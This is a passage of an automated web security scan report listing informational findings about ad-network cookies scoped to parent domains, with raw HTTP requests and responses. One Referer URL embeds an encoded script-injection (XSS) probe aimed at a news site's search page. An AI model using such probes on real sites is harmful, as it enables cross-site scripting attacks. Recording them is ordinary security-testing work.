Cookie: g="aABgmj8uw==BCan85n-7WKY7Ss|20285|92765|1041137|18405|1518|101707|445|43622|8722AAABL-SS69E="; c="aAGG0IReg==AFd1518AB1AAABL-SS69A=AFv3828AB1AAABL-SS69A=AGu23820AB1AAABL-SS69A=AGt23820AB1AAABL-SS69A=AGb20285AB1AAABL-SS69A=AGa20285AB1AAABL-SS69A="; s="aAC7BDsnw==AE9479AN1294103956000AAABL-SS69A=AE8438AN1275963655000AAABL-SS69A="; a1=1CAESEA0pzwV4-SdN2wuhHcO4rdI; t=1305209963284; a2=2724386019227846218; t1=1305209966477; a=c615022824147045895; o=1-emLGD8YOQiy1; r=1305209924560; m="aAC4IU7vg==AI20474259AAABL_5mTvg=AI20474259AAABL_5k7_k="; u="aABpVi0zA==AI89bBrQ==AAABL_5mTvg="; f="aAC9KJdew==AK1305643118AB2AAABL_5mTvc=AK1305209924AB1AAABL-SS69A="; e=cb

Response

10.22. http://a.rfihub.com/tk.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.rfihub.com
Path:	/tk.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

u="aABrI9nPw==AI89bBrQ==AAABMJ0V_e0=";Version=1;Path=/;Domain=.rfihub.com;Expires=Sun, 16-Dec-2012 10:12:02 GMT;Max-Age=47347200

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tk.gif?rb=445&re=12387&aa=19789,90461,19370,1862541,1504,23252,qN5EtAqqMvGW,http%3A%2F%2Frocketfuelinc.com,901,3788,51259,2390,8661&pa=ppre3055140816039&id=&ra=3055207030.8905419525157752&ct=1308305520703 HTTP/1.1
Host: a.rfihub.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/sed?w=300&h=250&re=12387&pv=0&ra=3055140830.8481068485217647&rb=445&ca=&rc=&rd=http%3A%2F%2Fadclick.g.doubleclick.net%2Faclk%253Fsa%253Dl%2526ai%253DBGZxhZij7TY_LHIuY6QbcnsjECc-Bso8Cj9qbsyKb7MqEJwAQARgBIAA4AVCAx-HEBGDJ1vKGyKP8GoIBF2NhLXB1Yi01NjcyNTU3NDU3ODM0NDU0oAGz7MfrA7IBD3NlYXJjaC5jbmJjLmNvbboBCjMwMHgyNTBfYXPIAQnaAZ8BaHR0cDovL3NlYXJjaC5jbmJjLmNvbS9tYWluLmRvP3RhcmdldD1hbGwma2V5d29yZHM9eHNzM2EzNGIlM0Mvc2NyaXB0JTNFJTNDc2NyaXB0JTNFYWxlcnQoMSklM0Mvc2NyaXB0JTNFN2M1ZmE1NGJhMzZjY2E2OCZjYXRlZ29yaWVzPWV4Y2x1ZGUmc2VhcmNoYm94aW5wdXQ9eHNzmALyEcACBMgCze_PDqgDAfUDAgAARPUDIAAAAIAGocWLibeSzNGRAQ%2526num%253D1%2526sig%253DAGiWqtxiB7PhdyqkGidLM7p1mIFKK9-TJg%2526client%253Dca-pub-5672557457834454%2526adurl%253D&ua=&ub=&uc=&ud=&ue=&pa=ppre3055140816039&pb=&pc=&pd=&pg=&ct=1308305514083&co=false&ep=TfsoZgAHJY8K2kwLmJIPXHR4qq0JxG4Pwd52ow&ri=4dfb286607258fada4cb9892f5c1&rs=4355cd3c1f5990ce.anonymous.google&ai=19789&rt=23252&pe=http%3A%2F%2Fsearch.cnbc.com%2Fmain.do%3Ftarget%3Dall%26keywords%3Dxss3a34b%253C%2Fscript%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E7c5fa54ba36cca68%26categories%3Dexclude%26searchboxinput%3Dxss&pf=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue
Cookie: g="aACtavFTw==BCaqN5EtAqqMvGW|19789|90461|1862541|19370|1504|101707|445|51259|8661AAABMJ0V31g=BCan85n-7WKY7Ss|20285|92765|1041137|18405|1518|101707|445|43622|8722AAABL-SS69E="; c="aAMJUePFA==AFd1504AB1AAABMJ0V31c=AFv3788AB1AAABMJ0V31c=AGu23252AB1AAABMJ0V31c=AGt23252AB1AAABMJ0V31c=AGb19789AB1AAABMJ0V31c=AGa19789AB1AAABMJ0V31c=AFd1518AB1AAABL-SS69A=AFv3828AB1AAABL-SS69A=AGu23820AB1AAABL-SS69A=AGt23820AB1AAABL-SS69A=AGb20285AB1AAABL-SS69A=AGa20285AB1AAABL-SS69A="; s="aAC9ii3_w==AE9479AN1294103956000AAABMJ0V31c=AE8438AN1275963655000AAABMJ0V31c="; a1=1CAESEA0pzwV4-SdN2wuhHcO4rdI; t=1305209963284; a2=2724386019227846218; t1=1305209966477; a=c615022824147045895; o=1-emLGD8YOQiy1; r=1305209924560; m="aAC4IU7vg==AI20474259AAABL_5mTvg=AI20474259AAABL_5k7_k="; u="aABrHqp5A==AI89bBrQ==AAABMJ0V31c="; f="aADeAeSEw==AK1308305514AB1AAABMJ0V31c=AK1305643118AB2AAABL_5mTvc=AK1305209924AB1AAABL-SS69A="; e=cl

Response

HTTP/1.1 200 OK
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: u="aABrI9nPw==AI89bBrQ==AAABMJ0V_e0=";Version=1;Path=/;Domain=.rfihub.com;Expires=Sun, 16-Dec-2012 10:12:02 GMT;Max-Age=47347200
Expires: Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: e=cl;Path=/;Domain=.rfihub.com;Expires=Sun, 16-Dec-2012 10:12:02 GMT
Cache-Control: no-cache
Content-Type: image/gif
Content-Length: 42

GIF89a.............!.......,........@..D.;

10.23. http://a.tribalfusion.com/i.match previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/i.match

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ANON_ID=amnDNYy4ZaEexMeqAZbwej4ygEvy92VwWWd1ma2ZaFUeZcH65h7duwY9kh55MntlJRfLTZbZdAxjJ4INHcML4ZdjUjSqHZdc11ZcGqJOCRCB4kBCFFrlTexZb3kdS42Id5NHWT0S5n4eJ9c4J2LK6ZdngrGxKHZdm6QsjCEu9m64ZcfSZanpY3twRyVRmbe1ag1ecYHl62g6mswdwg3vdibpyhGM9vBRmC9ptHZaeHWE3mNpnWWfaHtYMFcaehxZdQ57509jA0P3bicEK2iB1plJuLAZb8PcrKJ7IIT8ce55xY3ZbOTOkvZcHZcZcOZc3v1uuhIpTgZaU5kusHedWlyy5RIaCObZckX84fSy84vQsZcEmU7CgqaCS2k1iW1fESxg6RV4aGbZaxNOxQqsgqCNXRNhZdtaMpjxNgihNfxrrutT5PC3ALXPa8X8nfWSjkZa800GCNWK7gOZaZdipYei0fkZaZbIQRowITTQESt2Jvi2w7c3mPgDmLkniFFwpRONZdlSiys6mWQL056evGFhGggoFKDInTVOmUYZdS86J9j0RK9f3C3G4AfmTbCFBZcY3aGaHGaiFNZbfI2Y; path=/; domain=.tribalfusion.com; expires=Wed, 14-Sep-2011 14:08:59 GMT;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /i.match?p=b1&u=4dce8a530508b02d HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://a.tribalfusion.com/p.media/aYmNJH2mYHpWAqVdJ6XFfd1bjf1qypPbFFUrZbXTtQXoFBsPFroXqMn5aJl2arPoEbCYrU6WWrRmPvBnVrqotUE3EMi2dmy4mvJprQK0Gn0YcMU1VvMnqj43rZbVWUnEVP32QTQQQG3qQt7O1H7uTmUu2GnX0brZdTPmw2SQS8JJC6j/2522456/frame.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=asnBNvxZduOZbuUu3snRZaiAoJteqW74LMry1UlSU5kgwsskZbaBQJ65rSwRpgwp3rZa3gHZdQfYYaDIZaOXkNKB7DEBVCK1g2Qwdco0QZaZa5jNCZdl7qAZdJ3gSBhmGDtCJQZcTyeZdfwHlZcfBDDiZcd6VGXh0SyCNFBfOZcW08VdEIVW0WG3nbDpcDxx5EtDKq9BQCTZcKqdOKVItRXC0oIxZarbOnZaP2002giIYOSrIih8BNUPr7NwfvMBsW4DaRQi9yBynyqCnwWjqPTvjAcIevaQeo60FH167s3SF4wj9kkRoOGL8ShHp4kdIUnQ9PZcEQixtuDyptLjA53Zcb95Zd6J0B2yHCC01NHZauLJPaJUFRZd1ZbDdqHAUE3qycpPUMvn4ElDdZdZac2EkOyGavpAeBBQhZaRjbOZdVFxln6q9c7M8AiZcYMdpwpFaUbBbB4GlY5iSCdh84HDRcS82VZa065Zcwi1IlAUB84eyRNC8mMAhZdsFyN8i0nkZcopuVmELIuQF0rcP2heaCTL3V7vOfXf84AO0lgQJC2dZabkopcEqqx

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
Date: Thu, 16 Jun 2011 14:08:59 GMT
X-Function: 302
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=amnDNYy4ZaEexMeqAZbwej4ygEvy92VwWWd1ma2ZaFUeZcH65h7duwY9kh55MntlJRfLTZbZdAxjJ4INHcML4ZdjUjSqHZdc11ZcGqJOCRCB4kBCFFrlTexZb3kdS42Id5NHWT0S5n4eJ9c4J2LK6ZdngrGxKHZdm6QsjCEu9m64ZcfSZanpY3twRyVRmbe1ag1ecYHl62g6mswdwg3vdibpyhGM9vBRmC9ptHZaeHWE3mNpnWWfaHtYMFcaehxZdQ57509jA0P3bicEK2iB1plJuLAZb8PcrKJ7IIT8ce55xY3ZbOTOkvZcHZcZcOZc3v1uuhIpTgZaU5kusHedWlyy5RIaCObZckX84fSy84vQsZcEmU7CgqaCS2k1iW1fESxg6RV4aGbZaxNOxQqsgqCNXRNhZdtaMpjxNgihNfxrrutT5PC3ALXPa8X8nfWSjkZa800GCNWK7gOZaZdipYei0fkZaZbIQRowITTQESt2Jvi2w7c3mPgDmLkniFFwpRONZdlSiys6mWQL056evGFhGggoFKDInTVOmUYZdS86J9j0RK9f3C3G4AfmTbCFBZcY3aGaHGaiFNZbfI2Y; path=/; domain=.tribalfusion.com; expires=Wed, 14-Sep-2011 14:08:59 GMT;
Content-Type: image/gif
Content-Length: 43
Connection: keep-alive

GIF89a.............!.......,........@..D..;

10.24. http://a.tribalfusion.com/j.ad previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/j.ad

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ANON_ID=arnhZb5NZaiMsmmemKmCgor4YaQXE6RAWKI8UAB9Lcni6D3W6FCquFPctEv7K0QZd5HK33UBp2mGKPbZc0jt4y8GmrZcXgCq7lWbcvE4Grn74AoEpKKXesveInly0ddXUUHc9ZbfqKIo2bmkJtPKJPvD5BMy2bB09PiTecC5nQmUxWIZcaOJNOB6JARCdpnpYii6JHAffrfYD3yCeZbWe3qrifZdZbZcvc9qxZdv03o31HZbZa6bEC3LCiFrCpUd0lwm5BR2ZbIJ5BiACRq7G8Zan8Vv4h48bQvfSu1r8j9pZaIUq0E1PFUAFm8ulDW9WU6Jlb3Zcyij9r3rKKV662BSghZbZbpdZbaObJBtMlIbjA8bMmWtV4C6rqmmWkEhJiIuhcEQWwlokAyQbcHdfKPa0pbhGOxcjYgxqWMJCX4W3XlUdtE5JIVU1LI1i7i0lmha4JYDZbO52XaZbo0opMYVl6j4xn3uwUr3xl9TtNGuZbAAkwaIu8oS; path=/; domain=.tribalfusion.com; expires=Wed, 14-Sep-2011 12:06:28 GMT;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /j.ad?site=admeldae&adSpace=audienceselect&size=1x1&admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_dataprovider_id=10&admeld_callback=http://tag.admeld.com/pixel HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308225195243&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fburp%2Fshow%2F3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=aungjUwl6hwUQQwgQRaCFyUS7jC64OywUPxH2ILm35hSvP9FsxMpesmpvZcKIfCWWhrWEmo3P82WbGmlrZcx7bYZcZagpWnmhairy6ma7rJZb2NA6HsUJcwdNZbaPZbs2Nb2PgQrirwuO5T3mBsjwZc6n329ruwdYsDmIQ7to3tB6ZbwdyuKZdUaV6IeZa6gVVsdAjgeoEB700gMh3ZdOtZd67b0AmhcNCddDXtZaYcwYZd1e7Zb2dZdRfvDfUlFtQ823R25PKTHZabPZax2JX8F6clMqSZaORTCEDtY90WCRXbpAtNEHsrWXN8S2QpOdP6Q6Zd41WXX2R1yIrKYkpZcfxSRoho14QMZbSB36SmkGC0185hLHQsZaKwCrPRcGI54u10SehUmjwOtm54055TZdrgTkHc7m0BimPPCqGAjO55gdM06TeYZbsbZap6n1ZcNJAwGBYIhgR8oWONy4mlQZbZdoO3NBHYYQHoFrMrMTb6CZcw

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 101
X-Reuse-Index: 1
Pragma: no-cache
Cache-Control: private, no-cache, no-store, proxy-revalidate
Set-Cookie: ANON_ID=arnhZb5NZaiMsmmemKmCgor4YaQXE6RAWKI8UAB9Lcni6D3W6FCquFPctEv7K0QZd5HK33UBp2mGKPbZc0jt4y8GmrZcXgCq7lWbcvE4Grn74AoEpKKXesveInly0ddXUUHc9ZbfqKIo2bmkJtPKJPvD5BMy2bB09PiTecC5nQmUxWIZcaOJNOB6JARCdpnpYii6JHAffrfYD3yCeZbWe3qrifZdZbZcvc9qxZdv03o31HZbZa6bEC3LCiFrCpUd0lwm5BR2ZbIJ5BiACRq7G8Zan8Vv4h48bQvfSu1r8j9pZaIUq0E1PFUAFm8ulDW9WU6Jlb3Zcyij9r3rKKV662BSghZbZbpdZbaObJBtMlIbjA8bMmWtV4C6rqmmWkEhJiIuhcEQWwlokAyQbcHdfKPa0pbhGOxcjYgxqWMJCX4W3XlUdtE5JIVU1LI1i7i0lmha4JYDZbO52XaZbo0opMYVl6j4xn3uwUr3xl9TtNGuZbAAkwaIu8oS; path=/; domain=.tribalfusion.com; expires=Wed, 14-Sep-2011 12:06:28 GMT;
Content-Type: application/x-javascript
Vary: Accept-Encoding
Content-Length: 224
Expires: 0
Connection: keep-alive

document.write('<script type="text/javascript" language="JavaScript">\r\nvar img = new Image();\r\nimg.src = "http://tag.admeld.com/pixel?admeld_dataprovider_id=10&_seg=&external_user_id=0&expiration=
...[SNIP]...

10.25. http://a1.interclick.com/ColDta.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a1.interclick.com
Path:	/ColDta.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

tpd=e20=1308573230578&e90=1308838755219&e50=1308573231659&e100=1308838755889; domain=.interclick.com; expires=Sat, 16-Jul-2011 14:22:27 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ColDta.aspx HTTP/1.1
Host: a1.interclick.com
Proxy-Connection: keep-alive
Referer: http://cdn.interclick.com/DtCol.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: T=1; uid=u=8fb5e3ac-83a3-4cca-8da7-7f2e4e96648c; Aqprep_Banner160X600=157033=634420788549939172:51744; sgm=9622=734271&9000=734271&570=734271&410=734271&846=734271&7472=734279&6790=734276&7434=734280&7594=734283&428=734285&11062=734293&11060=734293; Li=1=734303&30=734277; FC_53=167861=17623304:2; Aqprep_Banner728X90=154840=634415637907052842:50930&157035=634420788550214247:51744&167861=634438162292742581:13501; ucap=sl=0; FC_51=167859=17623306:1&155104=17623306:1; IFC=n=4&w13501=4&a167861=2&e=634438973595758677&a167859=1&a155104=1; Aqprep_Banner300X250=157034=634420788548305005:51744&161467=634415638953988496:51417&167859=634438162318162619:13501&155104=634438165415021743:13501; tpd=e20=1308573230578&e90=1308838755219&e50=1308573231659&e100=1308838755889&i90=2011051519270862126421219180&i100=

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 70
Content-Type: image/gif
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: tpd=e20=1308573230578&e90=1308838755219&e50=1308573231659&e100=1308838755889; domain=.interclick.com; expires=Sat, 16-Jul-2011 14:22:27 GMT; path=/
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Thu, 16 Jun 2011 14:22:26 GMT

GIF89a...................!..NETSCAPE2.0.....!.......,................;

10.26. http://a1.interclick.com/Segment.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a1.interclick.com
Path:	/Segment.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

sgm=9622=734271&9000=734271&570=734271&410=734271&846=734271&7472=734279&6790=734276&7434=734280&7594=734283&428=734285&11062=734293&11060=734293&8170=734303&202=734303; domain=.interclick.com; expires=Wed, 16-Jun-2021 11:32:15 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Segment.aspx?sid=f85837ad-c6eb-47a9-95c4-464dfa36a86e HTTP/1.1
Host: a1.interclick.com
Proxy-Connection: keep-alive
Referer: http://login.dotomi.com/ucm/UCMController?dtm_com=28&dtm_cmagic=359365&dtm_fid=101&dtm_format=5&cli_promo_id=1&dtmc_ver=2&dtm_cid=2339&dtmc_url=http%3A//www.homedepot.com/webapp/wcs/stores/servlet/Navigation%3FstoreId%3D10051%26categoryID%3D556456%26langId%3D-1%26catalogId%3D10053%26selectedCatgry%3DSEARCH%2520ALL%26navFlow%3D3%26searchRedirect%3Dlawn%2520mower%26Nu%3DP_PARENT_ID%26locStoreNum%3D4501&dtmc_category=Outdoors%3EOutdoor%20Power%20Equipment%3EWalk%20Behind%20Mowers&dtmc_prop_one=Outdoors%3EOutdoor%20Power%20Equipment%3EWalk%20Behind%20Mowers&dtmc_prop_two=e04ee989-dab2-408d-ab5e-0f5dd59957f0&dtmc_prop_four=lawn%20mower&dtmc_page_type=Subcategory&
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: T=1; uid=u=8fb5e3ac-83a3-4cca-8da7-7f2e4e96648c; tpd=e20=1308573230578&e90=1306586030476&e50=1308573231659&e100=1306586032110; Aqprep_Banner728X90=154840=634415637907052842:50930&157035=634420788550214247:51744; Aqprep_Banner160X600=157033=634420788549939172:51744; Aqprep_Banner300X250=157034=634420788548305005:51744&161467=634415638953988496:51417; Li=1=734283&30=734277; sgm=9622=734271&9000=734271&570=734271&410=734271&846=734271&7472=734279&6790=734276&7434=734280&7594=734283&428=734285&11062=734293&11060=734293

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 43
Content-Type: image/gif
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: sgm=9622=734271&9000=734271&570=734271&410=734271&846=734271&7472=734279&6790=734276&7434=734280&7594=734283&428=734285&11062=734293&11060=734293&8170=734303&202=734303; domain=.interclick.com; expires=Wed, 16-Jun-2021 11:32:15 GMT; path=/
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Thu, 16 Jun 2011 11:32:15 GMT

GIF89a.............!.......,...........D..;

10.27. http://admeld.adnxs.com/usersync previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://admeld.adnxs.com
Path:	/usersync

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

uuid2=3420415245200633085; path=/; expires=Wed, 14-Sep-2011 12:05:58 GMT; domain=.adnxs.com; HttpOnly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /usersync?calltype=admeld&admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=193&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: admeld.adnxs.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308225195243&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fburp%2Fshow%2F3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChEI_3YQChgBIAEoATDOzeXvBBDOzeXvBBgA; anj=Kfw)k=m<8a)J710KuqQv<wO[?.Z_6mQq(g8AdPznm4mV81(GwAdiq`tRFu9!<9WzID'dGuNsFx#:D$8):ECJr9*<7Y2B>h7#K-)26=S$JLUK>tc`oa^hD)BGY/HDIhRDv9`a)c=8Ns>'sTtY@rKf[42mEhF[x1(Z_WwCH=Q+CR#M/Pcv%qJCor_')4ZdnJAHJC!a[2QmvVUX0Y_AKQ6]5HO+=VJZ`Cn[.2-IAX7bw@(a6>NjWme_:Ez/L:lx+(-pIN(s?u*Kp^>>(5'p4ofX#f0tYcv/p_jyip?!*]Dhn<#nKj>zFXcZ3]cqTB$x8^Vcd3Q-9>LakKGuGRw!Wji-MU9XpC`s@ic92+2>.GL=U`b%(%gUKPx$]'`FGhEuD(sI?!QUr=v^-Mw`]j'Z.GUWgN$LX9J+!8fE#32>o8R`ORKPT@'^f3FPpl/vc(/uBHutpQhMdK68AZiL))1=C1hP-UYc7$L8HQ4R_fODEItt9)Se99+Gb46bp3t#1x-akYef0CGm/MocK_-@Tp5y1_eYlocCWH/?W=eW+d^NMAs)%MKv$X4.^owlwj<.lUF)12uChi8B:r08nN+5]N0mcIu/@qO$hlOz@IaFRGpZ*%hA-[It2owGgYBR3JoC5rww'EPwpN%zx; sess=1; uuid2=3420415245200633085

Response

10.28. http://ads.revsci.net/adserver/ako previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.revsci.net
Path:	/adserver/ako

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rsiPus_oZWc="MLsXtSMNZzhvJZE469KkOkhRHfJm5qBSudNqQAOkdAaA6yg6yEdCljXybgkx/j61zQyuiToHf5iqPiyCgqe7ihtvDaMnTyr8hvk/1zvGDoKVMLvpIARTfXWibSIPnJq7tzx2HS5mSxNK9mEK0LUJBBtxfTkHhZQLIVRUl4qoS0+OQpKf0hLXuTrfH88W0K0/30f5u2F/VBLZqzXTG3ylxTAeICYpAkIDo+s6osVriy+CkZUKalTKvuvS3D2v1PFf7iTT9vE4x3PTaP+VhHgV8nk5mUMjNfRxGTZjv701p4CP71ZESA8f8DNYUWJrlBcJV+Vh/cAFvo3zS/BohFTIipdPdA6QSmXM5J8zvIBegihj3Pwn7dKs6nNdkWzB4iDLY1dHtq6IzjgHGeZfiT0SZ+Qu5CI5lXsHTPdSw7I4UrfdRY3tH2TwDhLQ9WG+A+4pN455ZIR8Pha1/dMXvt2GB6X1wTJydAE2JuxgdhKYLaFUB52dQe0tsPdUiQjV5sniqXujjXxaYn0M1u8v1Fsmap3dORXvfIOH08tqGXEVxvJLiDwpOZ0nGoaAvSE4e1qLnZfsLuszSsguE9hpOs9HVIZFS5zGLvOR0nZtjTNi4ysdnRa/H6PC3RJSHY70CL+OZtZoaB96YE28lHZVGKQWtayOMiG0wYQ+MMe1yzjc6PTo8BslL65Z0LjmOQRybrpN2LDqA1J+HIeAxOhm77/uYv8j9EjAXyXTzGSgvAvwgv+exbH1nc/EjIddHJPxoCf8ADAcHMY0iIfJalpPnZHzum2RBlrBaL3Iwj4byLzDLstaninCL0aYGwNdSBcfjQOrTj7yV5gPRFNZMNVFmNLkLzMuA7EikwTf0jqqJY6iwXQfxTP3NwhU/9anfAvJ5sjrRguvx0OIBgoAuavxfKS+uDrwM1PkcoSqJTjjANeCksaQ0w7hAdppyeDXF8N7IDthDxd5v7AdSMaw7iS2SaVd3TWFV5tpecd2XXSslgDDyMT561sh+lenweHrNMuHp9cKcL+Lzi8R0x5C38HuJbRE74Zwsua9KDq2628lPQjA7Ndbxr50nPcZS9CdLODEuwL8c6G6/af4CGX9wcfm3W+XhsiGoZCt+LpRI5qLx1gDLkLMzqnlSXytK6UzF6d5YrcYVxfE5T3+yOqsPBLQMsZRKCA9hP4RSr00b/JxDceMl9GEtPqOCp46JBdpU0gBdQQhRf4zMg575CHYHKS7kelb8hWB+Obmdbl0UbGuYP4cXmxCAro+5ZmawZ5OmKu0f55Qxe9YDdohNkAWJSUGGoUiGSp+majFrI5JXrV8xWFMjPnEZjjyLIcNIWqX/DBZQgAmPW/K1kFGCr3+zNLW32fJxJfg"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
rsi_us_1000000="pUM14ymnMBYY7dXKYa4+QBq0n9/GBbL4c0FLnOpZcOMWXfdIoqBu9CkdNxlQjRVrm76xoeXKd2rqlUsklaD7QC+F/ow1QxM58Yyl6WnV++4nDUcwbFT7BTwJlQNkxSfqk5EhERJiohDhufcOy3Id1igSTjWGWtFgOwRDxL6wisceGScbfetKK4BxmEo0Jf/6ggwMwCdr0RM7KzxbQPxF5AxyiUrBIfftgLaEmSxXt16/t7NUl3b05qIiQxcDeOS9ESfAvZ+srDdH6HKD4ns8LnSqR4r8JoZavI6/Pq+Fi2+QPndI6oUGSTSGOB6mSiq0G79yS8n9fumcLKvtCiPQ8LczowEtlpEFRKgp7YQ8VrvHvcVF2ZgBlwZfzy7L0brB9FTXEVeq85mn+ogNLpohJejQnvSINawyafJEonBB4XAvdwG2Z2uDopXs8BiqRZsbItOX89VaijRf04/hJXwgAjrujJLgwIQXJvj7hyx+xLVSb0mSWpdAywJjaNUJlttpRPXnHmwwB7WUov7tBSZT5Yw49gtvbgeR6vS/pYWO3Y9XI1eHqlL3n1CDwg8xBRWak2/69bsCjbXTbMMSJtLN0v5gBVlBeR2DD9NWA2HbvPjsqQE0fB/otaogzQgzUuJT3yFecoAfGp55+Dz27egYx8wcNR3ZBfrvhhc2NJBCXut70+WkSvjxcDPqFZ53R5JyA0JNpauWgOEmKjm++q8BX/AK7SRqNuRc9WJKdkL9Iv3EiV4xD0VpAW9b/7VUQXHUdBQCPLYrQuByi1kJICahjNh+sK7F9uFNParIk3qJosYR2M1h5gmiwt26uVxKxPCXzhSt8acviZE9e0CN7aWCwq9ajeFA8NEswRo0XRtcBY8juUWW6icPR3Taxs4hhNqKNuVaw2WfQc2FPpK6TTRYMbv/tjS2J9GxPBRtoBa2JmpjEQ2cwE5pax2GfB1WT2QdegbRFaICdC+l/vKzbHrKq0VGMBifZSmcJO4CPCjVY//F9DAa8+m3o+aWkBghpmv/ED28I488TH7FzcWJHXuvpbQs6qk0sGGCL2Qm2G7jocOOpBHUBUB2HhPc31J7OThksnfG6M3RiPtJLoOhujeBo90PvjAr74jA4OKswU78Y6NYg7EcLq6OnwPK5vKF6abTG9owpzKUW/j269fn6YrnC4jrPKmgAPD7xe5mP2s8DrgSslVqcKp3A/fzuvGlhpfGcdRJPWN3Gv12fbqeEbeEqLEuf0acfDwsvlIGLcdlSB42a0qq6KcWgGwPOyloB/WNS8SdcRwMDSxIvB/Rn4VuyOEXxnTk+50FTr1kui3jEbyG99/fl2p572qawJyun7m6BhaM5l58xi77SYrHpZRWma0mGe+q+5cJtwfk+82IV+EAJjWKra7kb4Np0D5lRxYfgVNHrc+c/ol5kF1JRAbRKCkgsiz/hPmNLXjBCpqJlxzpRX/YD2t6dy/pNmwpRuYe2mJJNNCOhCYBkOgkgXE/v8r87yn4iyDPmrwAyBNBjBIFHNkushw1OZFGwrFt0P+P7GxnXOiL+Lr3oEoXw0fS4GxCoxayOYwcOgK+mxU2